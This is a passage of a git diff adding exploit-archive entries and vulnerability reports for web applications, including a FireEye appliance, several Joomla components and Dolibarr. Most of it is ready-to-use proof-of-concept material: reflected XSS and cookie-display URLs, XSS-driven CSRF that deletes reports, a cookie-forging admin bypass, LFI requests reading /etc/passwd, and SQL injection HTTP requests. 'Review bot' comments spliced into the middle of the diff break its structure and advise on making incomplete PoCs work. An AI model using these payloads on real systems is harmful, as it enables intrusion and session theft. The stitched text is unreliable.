0%2C98%2C114%2C32%2C47%2C62%2C60%2C47%2C102%2C111%2C114%2C109%2C62%2C60%2C47%2C100%2C105%2C118%2C62%2C60%2C47%2C98%2C111%2C100%2C121%2C62%2C60%2C47%2C104%2C116%2C109%2C108%2C62))%3E - +Second XSS (reflected): - https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E - +Third XSS (reflected): - https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E -Show Cookie PoC: - https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Ccenter%3E%3Cscript%3Edocument.write%28%22%22%29%3C/script%3E%3Cb%3EUser%20Informations:%3C/b%3E%3Cbr/%3E%3Cscript%3Edocument.write%28document.cookie%29%3C/script%3E%3C/center%3E%3Cpwn - -[*] CSRF: - - PoC: - admin logout: - https://192.168.1.50/network/network?new_domain= - Url encoded admin deconnexion PoC: - https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E - Report deleting: - https://192.168.1.50/network/network?new_domain= - Url encoded report deleting Poc: - https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E -[*] SQLi PostGreSQL (Exploitable?): - https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2 -FROM events /** - - output: - Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved. -Couldn't find Event with id=9999 OR SELECT 1,2 FROM events - https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999 Output: - Event ID '99999999999' could not be retrieved. 
- PG::Error: ERROR: value "99999999999" is out of range for type -integer : SELECT "events".* FROM "events" WHERE "events"."id" = $1 LIMIT 1 - - -[*] Files & Directory Disclosure: - https://192.168.1.50/malware_analysis/ma_repo : the Input Path field -allow Path & file disclosure ../../../../../../../bin/sh (example) - - -{*] Others: - 1)No SQLi (Json) -https://192.168.1.50/network/network?new_domain[$ne]=blah - Return: {"$ne"=>"blah"} is not a valid host // Exploitable? - 2)Source code Info-leak: - https://192.168.1.50/manual/csc?mode=%3C/script%3E - --- -kmkz -PGP: B24EAF34 - diff --git a/platforms/php/webapps/33993.txt b/platforms/php/webapps/33993.txt new file mode 100755 index 000000000..c55f5c3d4 --- /dev/null +++ b/platforms/php/webapps/33993.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40203/info + +Planet Script is prone to a cross-site scripting vulnerability because the it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Planet Script 1.3 and prior are vulnerable. + +http://www.example.com/idomains.php?do=encode&decoded=&ext=[ Xss ] \ No newline at end of file diff --git a/platforms/php/webapps/33994.txt b/platforms/php/webapps/33994.txt new file mode 100755 index 000000000..d337c3092 --- /dev/null +++ b/platforms/php/webapps/33994.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40207/info
+
+PonVFTP is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
+
+Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
+
+The following example data is available:
+
+javascript:document.cookie="username=admin";
\ No newline at end of file
diff --git a/platforms/php/webapps/33997.txt b/platforms/php/webapps/33997.txt
new file mode 100755
index 000000000..b1521abd0
--- /dev/null
+++ b/platforms/php/webapps/33997.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40227/info
+
+NPDS Revolution is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+NPDS Revolution 10.02 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/download.php?op=geninfo&did=1%22%3E%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E
diff --git a/platforms/php/webapps/33998.html b/platforms/php/webapps/33998.html
new file mode 100755
index 000000000..79f3d6b4e
--- /dev/null
+++ b/platforms/php/webapps/33998.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40230/info
+
+The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to JComments 2.2 are vulnerable.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/33999.txt b/platforms/php/webapps/33999.txt
new file mode 100755
index 000000000..cefeee3c5
--- /dev/null
+++ b/platforms/php/webapps/33999.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40232/info
+
+Mobile Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Mobile Chat 2.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Mobile/main/chatsmileys.php/>">
+
diff --git a/platforms/php/webapps/34003.txt b/platforms/php/webapps/34003.txt
new file mode 100755
index 000000000..6b4b014b6
--- /dev/null
+++ b/platforms/php/webapps/34003.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/40244/info
+
+Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+The following Percha components are affected:
+
+com_perchaimageattach
+com_perchafieldsattach
+com_perchadownloadsattach
+com_perchagallery
+com_perchacategoriestree
+
+ http://www.example.com/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/34004.txt b/platforms/php/webapps/34004.txt
new file mode 100755
index 000000000..e68c83e75
--- /dev/null
+++ b/platforms/php/webapps/34004.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/40244/info
+
+Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+The following Percha components are affected:
+
+com_perchaimageattach
+com_perchafieldsattach
+com_perchadownloadsattach
+com_perchagallery
+com_perchacategoriestree
+
+http://www.example.com/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/34005.txt b/platforms/php/webapps/34005.txt
new file mode 100755
index 000000000..b3a803e27
--- /dev/null
+++ b/platforms/php/webapps/34005.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/40244/info
+
+Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+The following Percha components are affected:
+
+com_perchaimageattach
+com_perchafieldsattach
+com_perchadownloadsattach
+com_perchagallery
+com_perchacategoriestree
+
+http://www.example.com/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/34006.txt b/platforms/php/webapps/34006.txt
new file mode 100755
index 000000000..0b5b6f61e
--- /dev/null
+++ b/platforms/php/webapps/34006.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/40244/info
+
+Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+The following Percha components are affected:
+
+com_perchaimageattach
+com_perchafieldsattach
+com_perchadownloadsattach
+com_perchagallery
+com_perchacategoriestree
+
+http://www.example.com/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/34007.txt b/platforms/php/webapps/34007.txt
new file mode 100755
index 000000000..a1b5ea700
--- /dev/null
+++ b/platforms/php/webapps/34007.txt
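Review bot: The PoC `javascript:document.cookie="username=admin";` in 33994.txt shows that a client-writable `username` cookie is accepted as the authentication state, but the advisory never names the script that reads that cookie or the page to request once it is set, so the bypass cannot be reproduced from the text alone. I would add a line after the PoC such as `Set the cookie (any cookie editor works; most current browsers strip a javascript: URL pasted into the address bar) and then request the administrative page.` It is also worth stating that the remediation is not stricter validation of the cookie value: authorization has to be keyed to a server-side session record, because any self-asserted username in a cookie is attacker-controlled by definition.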
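Review bot: The hunk for 33998.html ends with an empty ninth line where the proof-of-concept should be, so the file as committed describes a JComments cross-site scripting issue with no reproduction material at all — no parameter, no request, no page. Given the .html extension this was presumably an HTML form or script PoC that was lost before the commit rather than an intentionally empty entry; that is inferred from the file name, not from the text. Verify against the BID 40230 source and restore it, or at minimum add a line naming the vulnerable parameter so the entry says more than "versions prior to 2.2".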
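Review bot: The PoC URL in 33999.txt, `http://www.example.com/Mobile/main/chatsmileys.php/>">`, stops immediately after the closing `">`, so the element that would execute script is missing and the line as committed is not a working reproduction. The `chatsmileys.php/...` form suggests the reflected value is the request path rather than a query parameter, which is worth stating explicitly if confirmed; that reading is inferred from the URL shape, not from the advisory text. Restore the tag that followed `">` from the BID 40232 source, or rewrite the line as a complete payload in the same style as the 33997.txt entry in this commit.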
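Review bot: The PoC in 34006.txt (and its siblings 34003–34005.txt, which differ only in the `option=` value) relies on a `%00` terminator to discard whatever suffix the component appends to the `controller` value, and that null-byte truncation in include() is rejected by PHP from 5.3.4 onward, yet the advisory does not record the PHP version it was tested against. I would add after the URL: `Note: the trailing %00 depends on null-byte truncation of the include path; on PHP >= 5.3.4 the request fails as written.` Whether the component appends `.php` or some other suffix is not visible in the text, so the note should be phrased in terms of the truncation rather than a specific extension.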
@@ -0,0 +1,1289 @@ +Vulnerability Name: SQL injection +Severity: Critical +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: All authenticated users + +Issue details: The "entity" parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the entity parameter, and a database error message was returned. + +The database appears to be MySQL. + +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update +-----------------------------89552749915619 +Content-Disposition: form-data; name="entity" + +1' +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: 
form-data; name="firstname" + +test1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ +-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): entity + +Steps to replicate: +1. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +2. Click on modify to modify the user details +3. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +4. After starting tamper data addon, click on save to save the user details and intercept the request +5. Manipulate entity parameter original value 1 with 1' and submit the request and see the output in browser +6. 
A single quote was submitted in the entity parameter, and a database error message was returned that is the proof of vulnerability + +Remediation detail: The application should handle errors gracefully and prevent SQL error messages from being returned in responses. +Issue background: SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands. +Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + +Vulnerability Name: SQL injection + +Severity: Critical + +URL: http://localhost/dolibarr/user/group/index.php +Affected Users: All authenticated users + +Issue details: The "sortorder " parameter appears to be vulnerable to SQL injection attacks. Attack payload 1##xa7## was submitted in the sortorder parameter, and a database error message was returned. + +The database appears to be MySQL. + +HTTP request: +GET /dolibarr/user/group/index.php?begin=&sall=&&search_group=&sortfield=g.nom&sortorder=1%c0%00xa7%c0%a2 HTTP/1.1 +Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=plsgp95ms82gnmrbp544u9tb71 +Host: localhost +Connection: Keep-alive +Accept-Encoding: gzip,deflate +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) +Accept: */* + +Affected parameter(s): sortorder + +Steps to replicate: +1. Login into Dolibarr application with any user and put below URL in address bar of the browser and see the response +2. 
A database error message was returned that is the proof of vulnerability + + + +Remediation detail: The application should handle errors gracefully and prevent SQL error messages from being returned in responses. +Issue background: SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands. +Tools used: Mozilla Firefox browser + + + + + + + + +Vulnerability Name: Link Injection (facilitates Cross-Site Request Forgery) +Severity: Critical +Affected Users: All authenticated users + +Issue details: The value of the dol_hide_leftmenu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %22%27%3E%3CIMG+SRC%3D%22http://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png%22%3E was submitted in the dol_hide_leftmenu parameter. The test response contained a link to the file "http://www.google.com/sites /overview.html", which proves that the Cross-Site Request Forgery attempt was successful. 
+ +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.0 +Cookie: DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=t2h9dudaj2qm7vp2skgkhpgs94 +Content-Length: 328 +Accept: */* +Accept-Language: en-US +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) +Host: localhost +Content-Type: application/x-www-form-urlencoded +Referer: http://localhost/dolibarr/ + +token=c9f908a134c0df6b6837b3cf06987c90&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu= %22%27%3E%3CIMG+SRC%3D%22http://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png%22%3E &dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Steps to replicate: +1. Open Dolibarr application in browser. +2. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +3. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +4. Manipulate dol_hide_leftmenu parameter value with payload %22%27%3E%3CIMG+SRC%3D%22http://upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png%22%3E and submit the request and see the output in browser +5. The test response contained a link to the file " http://upload.wikimedia.org/wikipedia/ commons/thumb/f/ff/Flag_of_Edward_England.svg/750px-Flag_of_Edward_England.svg.png ", which proves that the Cross-Site Request Forgery attempt was successful. 
Below Parameters are vulnerable to Link Injection vulnerability +Parameter URL +dol_use_jmobile http://localhost/dolibarr/index.php +dol_optimize_smallscreen http://localhost/dolibarr/index.php +dol_no_mouse_hover http://localhost/dolibarr/index.php +dol_hide_topmenu http://localhost/dolibarr/index.php +dol_hide_leftmenu http://localhost/dolibarr/index.php +dol_use_jmobile http://localhost/dolibarr/user/index.php +dol_optimize_smallscreen http://localhost/dolibarr/user/index.php +dol_no_mouse_hover http://localhost/dolibarr/user/index.php +dol_hide_topmenu http://localhost/dolibarr/user/index.php +dol_hide_leftmenu http://localhost/dolibarr/user/index.php +dol_use_jmobile http://localhost/dolibarr/user/logout.php +dol_optimize_smallscreen http://localhost/dolibarr/user/logout.php +dol_no_mouse_hover http://localhost/dolibarr/user/logout.php +dol_hide_topmenu http://localhost/dolibarr/user/logout.php +dol_hide_leftmenu http://localhost/dolibarr/user/logout.php + +Remediation detail: In most situations where user-controllable data is copied into application responses, Link Injection attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). 
+Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + +Vulnerability Name: Cross-site scripting (reflected) +Severity: Critical +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_hide_leftmenu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ddc8">f1fc4 was submitted in the dol_hide_leftmenu parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + +token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=6ddc8">f1fc4&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Affected 
parameter(s): dol_hide_leftmenu + +Steps to replicate: +1. Open Dolibarr application in browser. +2. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +3. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +4. Manipulate dol_hide_leftmenu parameter value with payload 6ddc8">f1fc4 and submit the request and see the output in browser +5. This input was echoed unmodified in the application's response that is the proof of vulnerability + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. 
An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + +Vulnerability Name: Cross-site scripting (reflected) +Severity: Critical +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_hide_topmenu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 0dc2b">8edb9 was submitted in the dol_hide_topmenu parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. 
+ +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + +token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=0dc2b">8edb9&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Affected parameter(s): dol_hide_topmenu + +Steps to replicate: +6. Open Dolibarr application in browser. +7. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +8. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +9. Manipulate dol_hide_topmenu parameter value with payload 0dc2b">8edb9 and submit the request and see the output in browser +10. 
This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. 
+Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_no_mouse_hover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a37bc">fce43 was submitted in the dol_no_mouse_hover parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + 
+token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=a37bc">fce43&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Affected parameter(s): dol_no_mouse_hover + +Steps to replicate: +11. Open Dolibarr application in browser. +12. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +13. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +14. Manipulate dol_no_mouse_hover parameter value with payload a37bc">fce43 and submit the request and see the output in browser +15. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). 
